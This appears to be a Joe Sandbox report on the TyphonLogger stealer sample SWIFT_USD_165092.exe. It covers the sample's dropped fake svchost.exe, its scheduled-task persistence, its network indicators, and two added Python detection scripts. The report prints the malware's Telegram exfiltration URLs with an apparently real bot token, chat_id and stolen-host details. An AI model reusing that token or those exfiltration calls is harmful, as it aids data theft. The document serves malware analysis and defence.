                    [22] cmd.exe: Started: 2 other processes [47]
                    [24] cmd.exe: Uses schtasks.exe or at.exe to add and modify task schedules; Drops PE files with benign system names. Started: conhost.exe [39]
                    [26] cmd.exe: dropped C:\Users\user\AppData\Roaming\...\svchost.exe (PE32); C:\Users\user\...\svchost.exe:Zone.Identifier (ASCII). Started: conhost.exe [41]
                    [29] SWIFT_USD_165092.exe: DNS/IP: api4.ipify.org 173.231.16.76, 49715, 49724, 80 WEBNXUS United States; api.telegram.org 149.154.167.220, 443, 49718, 49719 TELEGRAMRU United Kingdom; 4 other IPs or domains. Started: 7 other processes [49]
                    [31] cmd.exe: Started: 2 other processes [51]
                    [33] svchost.exe: Started: tasklist.exe [43]
                    [35] 2 other processes: Started: 2 other processes [53]
                    [37] 3 other processes: Started: 4 other processes [55]
                    [43] tasklist.exe: Started: conhost.exe [57]
                    [45] 6 other processes: Started: conhost.exe [59]; conhost.exe [61]; conhost.exe [63]; 3 other processes [71]
                    [49] 7 other processes: Started: conhost.exe [65]; conhost.exe [67]; conhost.exe [69]; 3 other processes [73]

                    Source | Detection | Scanner | Label
                    SWIFT_USD_165092.exe | 32% | ReversingLabs | Win32.Trojan.Woreflint
                    SWIFT_USD_165092.exe | 35% | Virustotal |
                    SWIFT_USD_165092.exe | 100% | Joe Sandbox ML |
                    Source | Detection | Scanner | Label
                    C:\Users\user\AppData\Roaming\svchost\svchost.exe | 100% | Joe Sandbox ML |
                    C:\Users\user\AppData\Roaming\svchost\svchost.exe | 32% | ReversingLabs | Win32.Trojan.Woreflint
                    No Antivirus matches
                    No Antivirus matches
                    Source | Detection | Scanner | Label
                    https://api.telegram.org4Dp | 0% | URL Reputation | safe
                    https://java.sun.com | 0% | URL Reputation | safe
                    https://api.telegram | 0% | URL Reputation | safe
                    https://api.telegram.org4Dp( | 0% | Avira URL Cloud | safe
                    http://api.ipify.orgD8Dp | 0% | Avira URL Cloud | safe
                    http://api.ipify.org4Dp | 0% | Avira URL Cloud | safe
                    https://subf.domfagdfa6ffaffiffn.comd/objecsts.json?api_key=123R | 0% | Avira URL Cloud | safe
                    https://ipapi.co4Dp | 0% | Avira URL Cloud | safe
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    ipapi.co | 172.67.69.226 | true | false | | high
                    api4.ipify.org | 173.231.16.76 | true | false | | high
                    api.telegram.org | 149.154.167.220 | true | false | | high
                    245.246.1.0.in-addr.arpa | unknown | unknown | false | | high
                    api.ipify.org | unknown | unknown | false | | high
                    Name | Malicious | Antivirus Detection | Reputation
                    https://api.telegram.org/bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendMessage?chat_id=1689002171&text=New%20TyphonLogger%20log!%0A---------------------%0AUsername:%20user%0AMachine%20name:%20128757%0AHWID:%201B269386E0%0AIP%20address:%2084.17.52.45%0A---------------------%0ABuild%20Tag:%20%0A---------------------%0AYour%20logs%20are%20in%20the%20ZIP%20file%20being%20uploaded.%0AThank%20you%20for%20using%20TyphonLogger!%0Ahttps://t.me/typhon_shop | false | | high
                    https://ipapi.co/84.17.52.45/json | false | | high
                    https://api.telegram.org/bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendDocument?chat_id=1689002171 | false | | high
                    http://api.ipify.org/ | false | | high
                    https://api.telegram.org/bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendMessage?chat_id=1689002171 | false | | high
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabSWIFT_USD_165092.exe, 00000001.00000003.481034503.000000000624E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.589310813.00000000055C8000.00000004.00000020.00020000.00000000.sdmp, 2956d154-79a0-458c-9507-f5de6e62dd96.1.dr, acf092cf-e9ca-4ee8-8b91-35872d9c173c.14.dr, b65d24f6-721c-4e3e-aed6-0778bb2b440a.14.dr, b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.drfalse
                                          high
                                          https://duckduckgo.com/ac/?q=b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.drfalse
                                            high
                                            https://t.me/typhon_shopD8DpSWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DDC000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.000000000335A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://api.telegram.orgSWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DDC000.00000004.00000800.00020000.00000000.sdmp, SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DD8000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.000000000335A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000003356000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoSWIFT_USD_165092.exe, 00000001.00000003.481034503.000000000624E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.589310813.00000000055C8000.00000004.00000020.00020000.00000000.sdmp, 2956d154-79a0-458c-9507-f5de6e62dd96.1.dr, acf092cf-e9ca-4ee8-8b91-35872d9c173c.14.dr, b65d24f6-721c-4e3e-aed6-0778bb2b440a.14.dr, b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.drfalse
                                                  high
                                                  https://api.telegram.org/botSWIFT_USD_165092.exe, 00000001.00000002.524320725.00000000028A9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.000000000311D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://api.ipify.org4DpSWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002E91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://search.yahoo.com?fr=crmas_sfpfSWIFT_USD_165092.exe, 00000001.00000003.481034503.000000000624E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.589310813.00000000055C8000.00000004.00000020.00020000.00000000.sdmp, 2956d154-79a0-458c-9507-f5de6e62dd96.1.dr, acf092cf-e9ca-4ee8-8b91-35872d9c173c.14.dr, b65d24f6-721c-4e3e-aed6-0778bb2b440a.14.dr, b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.drfalse
                                                      high
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.drfalse
                                                        high
                                                        http://upx.sf.netAmcache.hve.37.drfalse
                                                          high
                                                          https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchSWIFT_USD_165092.exe, 00000001.00000003.481034503.000000000624E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.589310813.00000000055C8000.00000004.00000020.00020000.00000000.sdmp, 2956d154-79a0-458c-9507-f5de6e62dd96.1.dr, acf092cf-e9ca-4ee8-8b91-35872d9c173c.14.dr, b65d24f6-721c-4e3e-aed6-0778bb2b440a.14.dr, b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.drfalse
                                                            high
                                                            https://api.telegram.org/bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendDocument?chat_id=1689SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DDC000.00000004.00000800.00020000.00000000.sdmp, SWIFT_USD_165092.exe, 00000001.00000002.524320725.00000000028A9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.000000000335A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=SWIFT_USD_165092.exe, 00000001.00000003.481034503.000000000624E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.589310813.00000000055C8000.00000004.00000020.00020000.00000000.sdmp, 2956d154-79a0-458c-9507-f5de6e62dd96.1.dr, acf092cf-e9ca-4ee8-8b91-35872d9c173c.14.dr, b65d24f6-721c-4e3e-aed6-0778bb2b440a.14.dr, b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.drfalse
                                                                high
                                                                http://api.ipify.orgSWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002841000.00000004.00000800.00020000.00000000.sdmp, SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.000000000332E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://ac.ecosia.org/autocomplete?q=b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.drfalse
                                                                    high
                                                                    https://search.yahoo.com?fr=crmas_sfpSWIFT_USD_165092.exe, 00000001.00000003.481034503.000000000624E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.589310813.00000000055C8000.00000004.00000020.00020000.00000000.sdmp, 2956d154-79a0-458c-9507-f5de6e62dd96.1.dr, acf092cf-e9ca-4ee8-8b91-35872d9c173c.14.dr, b65d24f6-721c-4e3e-aed6-0778bb2b440a.14.dr, b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.drfalse
                                                                      high
                                                                      https://ipapi.co4DpSWIFT_USD_165092.exe, 00000001.00000002.524320725.000000000287B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002ECB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://t.me/typhon_shop.SWIFT_USD_165092.exe, 00000001.00000002.533583456.0000000003B06000.00000004.00000800.00020000.00000000.sdmp, SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DB9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.662208925.0000000004012000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002F49000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.000000000332E000.00000004.00000800.00020000.00000000.sdmp, DotNetZip-cmmx3b12.tmp.1.dr, DotNetZip-dd5sgyyl.tmp.14.drfalse
                                                                        high
                                                                        https://api.telegram.org4DpSWIFT_USD_165092.exe, 00000001.00000002.524320725.00000000028A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://subf.domfagdfa6ffaffiffn.comd/objecsts.json?api_key=123RSWIFT_USD_165092.exe, svchost.exe.9.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://java.sun.comSWIFT_USD_165092.exe, 00000001.00000003.479687735.00000000061C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
Name | Source | Malicious | Antivirus Detection | Reputation
--- | --- | --- | --- | ---
https://t.me/typhon_shop | svchost.exe, 0000000E.00000002.651681057.0000000003356000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram | SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DD8000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: safe | unknown
http://www.codeplex.com/DotNetZip | svchost.exe, 0000000E.00000002.662208925.0000000004155000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://t.me/typho | SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org4Dp( | svchost.exe, 0000000E.00000002.651681057.0000000003356000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://api.ipify.orgD8Dp | SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp; svchost.exe, 0000000E.00000002.651681057.000000000332E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://api.telegram.org | SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DD8000.00000004.00000800.00020000.00000000.sdmp; svchost.exe, 0000000E.00000002.651681057.0000000003356000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002841000.00000004.00000800.00020000.00000000.sdmp; svchost.exe, 0000000E.00000002.651681057.0000000002E91000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.dr | false | | high
https://api.telegram.org/bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendMessage?chat_id=16890 | SWIFT_USD_165092.exe, 00000001.00000002.524320725.00000000028A9000.00000004.00000800.00020000.00000000.sdmp; SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp; svchost.exe, 0000000E.00000002.651681057.0000000003341000.00000004.00000800.00020000.00000000.sdmp; svchost.exe, 0000000E.00000002.651681057.0000000003354000.00000004.00000800.00020000.00000000.sdmp; svchost.exe, 0000000E.00000002.651681057.0000000003356000.00000004.00000800.00020000.00000000.sdmp | false | | high
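The URL list above shows the Telegram Bot API endpoint, including the bot token and the chat_id, sitting as plain strings in the memory of both the original sample and the dropped svchost.exe. As an added example (not part of the Joe Sandbox report and not the malware's own code), the Python below pulls those indicators out of a process-memory buffer. The buffer is constructed, the bot tokens in it are fake, and the token regex is an assumption about the format rather than a published specification. Because the sample is .NET, managed strings sit in memory as UTF-16LE, so the scanner checks both the raw bytes and both UTF-16LE alignments.

```python
import re
from dataclasses import dataclass
from typing import Iterator, List, Optional, Tuple
from urllib.parse import parse_qs

# A Telegram Bot API call has the shape
#   https://api.telegram.org/bot<bot_id>:<secret>/<method>?chat_id=<id>&...
# The secret pattern is an assumption (a run of at least 20 URL-safe characters),
# not a published format; adjust it if Telegram changes the token layout.
TELEGRAM_RE = re.compile(
    rb"https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]{20,})"
    rb"(?:/(?P<method>[A-Za-z]+))?(?:\?(?P<query>[A-Za-z0-9_=&%.\-]+))?"
)


@dataclass(frozen=True)
class TelegramIOC:
    bot_id: str
    secret: str
    method: Optional[str]   # e.g. sendMessage, sendDocument; None if truncated
    chat_id: Optional[str]  # destination chat, None if no query string was present
    encoding: str           # "ascii" or "utf-16-le": how the string sat in memory


def _views(buf: bytes) -> Iterator[Tuple[str, bytes]]:
    """Yield the raw buffer plus both UTF-16LE alignments re-encoded as Latin-1.

    .NET keeps managed strings as UTF-16LE, so a C# URL literal appears in a
    process dump with a NUL after every ASCII byte and the ASCII regex would miss
    it. Decoding at offsets 0 and 1 covers both possible alignments; bytes that
    do not form valid UTF-16 or fall outside Latin-1 are simply dropped.
    """
    yield "ascii", buf
    for offset in (0, 1):
        text = buf[offset:].decode("utf-16-le", errors="ignore")
        yield "utf-16-le", text.encode("latin-1", errors="ignore")


def extract_telegram_iocs(buf: bytes) -> List[TelegramIOC]:
    """Return the unique Telegram bot indicators found in a memory buffer."""
    found = set()
    for encoding, view in _views(buf):
        for m in TELEGRAM_RE.finditer(view):
            chat_id = None
            if m.group("query"):
                chat_id = parse_qs(m.group("query").decode("ascii")).get("chat_id", [None])[0]
            found.add(TelegramIOC(
                bot_id=m.group("bot_id").decode("ascii"),
                secret=m.group("secret").decode("ascii"),
                method=m.group("method").decode("ascii") if m.group("method") else None,
                chat_id=chat_id,
                encoding=encoding,
            ))
    return sorted(found, key=lambda i: (i.bot_id, i.method or "", i.chat_id or ""))


def format_ioc(ioc: TelegramIOC, redact: bool = True) -> str:
    """Render one indicator; the token secret is truncated by default so the
    line can go into a ticket without handing out a working bot credential."""
    secret = ioc.secret[:4] + "..." if redact else ioc.secret
    return (f"telegram-bot id={ioc.bot_id} token={ioc.bot_id}:{secret} "
            f"method={ioc.method or '-'} chat_id={ioc.chat_id or '-'} [{ioc.encoding}]")


# Constructed sample, not a real dump. It mixes an ASCII copy of the API URL
# (what the sandbox's string extraction shows), a junk-suffixed fragment like the
# "https://api.telegram.org4Dp(" entry above that carries no token, an unrelated
# URL, and a second call stored as UTF-16LE at an odd offset. Tokens are fake.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"https://api.telegram.org/bot123456789:AAExampleTokenNotReal_0123456789"
      b"/sendMessage?chat_id=16890&text=hello\x00"
    + b"https://api.telegram.org4Dp(\x00http://api.ipify.org\x00"
    + b"\x00" * 7
    + "https://api.telegram.org/bot987654321:AAAnotherFakeToken_abcdefghij/sendDocument".encode("utf-16-le")
    + b"\x00" * 16
)

if __name__ == "__main__":
    for ioc in extract_telegram_iocs(SAMPLE_DUMP):
        print(format_ioc(ioc))
```

Run it against the `.sdmp` files the report names (or a full minidump) instead of `SAMPLE_DUMP`; the bot_id and chat_id are the stable indicators to pivot on, since the operator can rotate the token secret without touching either.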
IP | Domain | Country | ASN | ASN Name | Malicious
--- | --- | --- | --- | --- | ---
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
173.231.16.76 | api4.ipify.org | United States | 18450 | WEBNXUS | false
172.67.69.226 | ipapi.co | United States | 13335 | CLOUDFLARENETUS | false
                                                                                      IP
                                                                                      192.168.2.1
                                                                                      Joe Sandbox Version:37.1.0 Beryl
                                                                                      Analysis ID:872897
                                                                                      Start date and time:2023-05-22 19:48:35 +02:00
                                                                                      Joe Sandbox Product:CloudBasic
                                                                                      Overall analysis duration:0h 13m 44s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:60
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • HDC enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample file name:SWIFT_USD_165092.exe
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.spyw.evad.winEXE@82/46@10/4
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 100%
                                                                                      HDC Information:Failed
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 100%
                                                                                      • Number of executed functions: 102
                                                                                      • Number of non-executed functions: 3
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .exe
                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 20.189.173.20
                                                                                      • Excluded domains from analysis (whitelisted): login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, watson.telemetry.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
--- | --- | ---
19:49:37 | Task Scheduler | Run new task: Nafifas path: "C:\Users\user\AppData\Roaming\svchost\svchost.exe"
19:49:38 | API Interceptor | 65x Sleep call for process: SWIFT_USD_165092.exe modified
19:50:06 | API Interceptor | 169x Sleep call for process: svchost.exe modified
19:50:33 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
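The timeline records the persistence step: a scheduled task named Nafifas whose action is a svchost.exe copy under %APPDATA%, not the genuine binary in System32. As an added example, not from the report, the Python below turns that into a hunt over exported Task Scheduler XML: it flags any action whose executable carries a core Windows binary name but does not live in one of the directories where that name is legitimate, and separately flags executables in user-writable paths. The task definitions are constructed (the Nafifas name and path come from the report; the trigger and the two benign tasks are made up), and the system-binary list and the environment-variable mapping are assumptions.

```python
import ntpath
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import Iterable, Iterator, List, Tuple

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Core Windows binary names that malware borrows for dropped payloads (this
# sample uses svchost.exe). The list is an assumption; extend it as needed.
SYSTEM_BINARY_NAMES = {
    "svchost.exe", "csrss.exe", "lsass.exe", "smss.exe", "wininit.exe",
    "winlogon.exe", "services.exe", "explorer.exe", "dwm.exe", "taskhostw.exe",
}

# The only directories where those names are legitimate on a default install.
TRUSTED_DIRS = {r"c:\windows", r"c:\windows\system32", r"c:\windows\syswow64"}

# Minimal %VAR% expansion so the check runs off-box on exported XML. On the host
# you would take these from the real environment; the values are assumptions.
ENV = {
    "systemroot": r"C:\Windows", "windir": r"C:\Windows",
    "appdata": r"C:\Users\user\AppData\Roaming",
    "localappdata": r"C:\Users\user\AppData\Local",
    "programdata": r"C:\ProgramData",
}


def expand_env(path: str) -> str:
    """Expand %VAR% references using ENV; unknown variables are left as-is."""
    return re.sub(r"%([^%]+)%", lambda m: ENV.get(m.group(1).lower(), m.group(0)), path)


@dataclass
class Finding:
    task: str
    command: str
    reasons: List[str]


def task_exec_commands(task_xml: str) -> Iterator[Tuple[str, str]]:
    """Yield (task URI, executable) for every <Exec> action in one task definition."""
    root = ET.fromstring(task_xml)
    uri = root.findtext("t:RegistrationInfo/t:URI", default="(unnamed)", namespaces=TASK_NS)
    for exec_node in root.findall(".//t:Actions/t:Exec", TASK_NS):
        command = exec_node.findtext("t:Command", default="", namespaces=TASK_NS)
        yield uri, command.strip().strip('"')


def assess_command(command: str) -> List[str]:
    """Return the reasons an action's executable looks like a masquerade, if any."""
    exe = expand_env(command)
    name = ntpath.basename(exe).lower()
    directory = ntpath.dirname(exe).lower().rstrip("\\")
    reasons = []
    if name in SYSTEM_BINARY_NAMES and directory not in TRUSTED_DIRS:
        reasons.append(f"system binary name '{name}' outside trusted directories")
    if re.search(r"\\(appdata|programdata|temp|downloads|public)\\", exe, re.IGNORECASE):
        reasons.append("executable lives in a user-writable location")
    return reasons


def hunt_scheduled_tasks(task_xmls: Iterable[str]) -> List[Finding]:
    """Run assess_command over every Exec action in the given task definitions."""
    findings = []
    for xml_text in task_xmls:
        for uri, command in task_exec_commands(xml_text):
            reasons = assess_command(command)
            if reasons:
                findings.append(Finding(uri, command, reasons))
    return findings


# Constructed task definitions. The first mirrors the report's timeline entry
# (task name and path are the report's; the trigger is made up). The other two
# are made-up benign tasks: the genuine svchost.exe from System32, and a vendor
# updater under Program Files that carries no system-binary name.
SAMPLE_TASKS = [
    r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Nafifas</URI></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec><Command>"C:\Users\user\AppData\Roaming\svchost\svchost.exe"</Command></Exec>
  </Actions>
</Task>""",
    r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Microsoft\Windows\Example\HostedService</URI></RegistrationInfo>
  <Actions Context="Author">
    <Exec><Command>%SystemRoot%\System32\svchost.exe</Command><Arguments>-k netsvcs</Arguments></Exec>
  </Actions>
</Task>""",
    r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\ExampleVendor\Updater</URI></RegistrationInfo>
  <Actions Context="Author">
    <Exec><Command>"C:\Program Files\ExampleVendor\updater.exe"</Command></Exec>
  </Actions>
</Task>""",
]

if __name__ == "__main__":
    for f in hunt_scheduled_tasks(SAMPLE_TASKS):
        print(f"{f.task}: {f.command} -> {'; '.join(f.reasons)}")
```

On a live host the XML comes from `schtasks /query /xml /tn <name>` or from the task files under %SystemRoot%\System32\Tasks; those files are UTF-16 with a byte-order mark, so decode them to text before handing them to `hunt_scheduled_tasks`.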
                                                                                      No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
--- | --- | --- | --- | ---
ipapi.co | New_Badge_Guide.pdf.exe | malicious | Discord Token Stealer | 104.26.8.44
 | Knowledge Base.html | malicious | HTMLPhisher | 104.26.9.44
 | Order_confirmation#28726.exe | malicious | Typhon Logger | 104.26.8.44
 | http://l-goot.co.jp/wf.php | malicious | Unknown | 104.26.9.44
 | f18itb3RpL.exe | malicious | Unknown | 172.67.69.226
 | 2eNUz808iz.exe | malicious | Unknown | 104.26.8.44
 | http://finnewsafrica.com | malicious | Unknown | 104.26.9.44
 | https://cx.surveysensum.com/d658up91 | malicious | HTMLPhisher | 104.26.9.44
 | b9.exe | malicious | Typhon Stealer | 104.26.9.44
 | http://bankreference2g.highradius.com/CAM/display | malicious | Unknown | 172.67.69.226
 | http://redirect.viglink.com | malicious | Unknown | 172.67.69.226
 | MSG834188.html | malicious | HTMLPhisher | 104.26.8.44
 | https://ms-online-arhaccounts.vercel.app/ | malicious | HTMLPhisher | 172.67.69.226
 | http://ms-online-arhaccounts.vercel.app/ | malicious | HTMLPhisher | 104.26.9.44
 | https://faas-nyc1-2ef2e6cc.doserverless.co/api/v1/web/fn-a0d6b988-2d39-4261-b1f3-196290d2513e/default/bra-des-cliente | malicious | Unknown | 104.26.8.44
 | https://ms-online-kelvinsmith.vercel.app/ | malicious | HTMLPhisher | 172.67.69.226
 | https://l.facebook.com/l.php?u=https%3A%2F%2Fappealcenter-2331.netlify.app%2F&h=AT3Ms2KDIY05Q79l2SYsArydmTLyBT0uln9V1Cs6ZPyHu4p905WxKUKkb_IdzbuXG-ZZHEk6c28hhpvw3ygrzK4P2saF70qyTsqQYwwp9H8aQSmX0BV_ZR_STB77wWkTjVF5wjrYsy77jhQspcgG&__tn__=-UK-R&c%5B0%5D=AT0EBvj_y1hOVZU1FIUdZP5x0wyw0p6yE480nyuOWwoA5lp9dSvixurJskwJGqt1kmj7HOlFvP17Z8GGHLRSXLk1hR84BAUbcVi7HoXVXb5RlyVKWIedmqCq_6bYEhO_Z_fNLax1EyV66K0OzDVnvFUohd3cS9q143pA5WOXT8GHXPAUqwfK91bBfx4DSYjMwFnmifr9wrNdMnzZujy9_TpQoSRj | malicious | Unknown | 104.26.8.44
 | https://llandudnopier-my.sharepoint.com/:o:/p/davebrown/Emkyeu1HZ3RKrW9Y-qBRl6QBCraZw-2g30UUpgAE68NPVw?e=5%3aG4LVWX&at=9 | malicious | HTMLPhisher | 172.67.69.226
 | kZUUYkO5WE.exe | malicious | Unknown | 104.26.8.44
 | kZUUYkO5WE.exe | malicious | Unknown | 172.67.69.226
api4.ipify.org | PO-23000326.exe | malicious | AgentTesla | 173.231.16.76
 | PI160256.exe | malicious | AgentTesla | 104.237.62.211
 | REQUEST_FOR_QUOTATION.exe | malicious | AgentTesla | 64.185.227.155
 | 7S0NJKqEdz.exe | malicious | AgentTesla | 104.237.62.211
 | Quote_609314275.exe | malicious | AgentTesla | 173.231.16.76
 | sheet.html | malicious | Unknown | 173.231.16.76
 | hesaphareketi-01.exe | malicious | AgentTesla | 104.237.62.211
 | Zapytanie ofertowe dla projektu w Lublinie 230522.vbs | malicious | AgentTesla | 64.185.227.155
 | PO_4000101479.exe | malicious | AgentTesla | 64.185.227.155
 | 22-05-23_SENAL_TRACTORA_FIRMA_23-05-23.pdf.exe | malicious | AgentTesla, GuLoader | 173.231.16.76
 | hesaphareketi-01.exe | malicious | AgentTesla | 104.237.62.211
 | RGH098765567000.jar | malicious | AgentTesla | 64.185.227.155
 | PrCzsQAbCL.exe | malicious | AgentTesla, zgRAT | 64.185.227.155
 | DHL_Invoice.exe | malicious | AgentTesla, zgRAT | 104.237.62.211
 | amV53aYjN9.exe | malicious | AgentTesla, zgRAT | 173.231.16.76
 | omqt8iW57t.exe | malicious | AgentTesla | 104.237.62.211
 | 21324322.exe | malicious | AgentTesla | 64.185.227.155
 | CAPs_INQUIRY_#2005023.exe | malicious | AgentTesla | 173.231.16.76
 | rNiwZcZvUE.exe | malicious | AgentTesla, zgRAT | 104.237.62.211
 | DiscordGenv1.04.exe | malicious | Discord Token Stealer | 173.231.16.76
                                                                                      No context
                                                                                      No context
                                                                                      No context
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):65536
                                                                                      Entropy (8bit):1.3790170045786567
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:/9SO4BHBUZMXCaPtHD6P8K5hz6gL/u7smS274ItBz:EOmBUZMXCapAhL/u7smX4ItBz
                                                                                      MD5:01165E133A752C24E4AFADF433402D3E
                                                                                      SHA1:79DBEFEB55116DF4275B5DB0460319DB335813D8
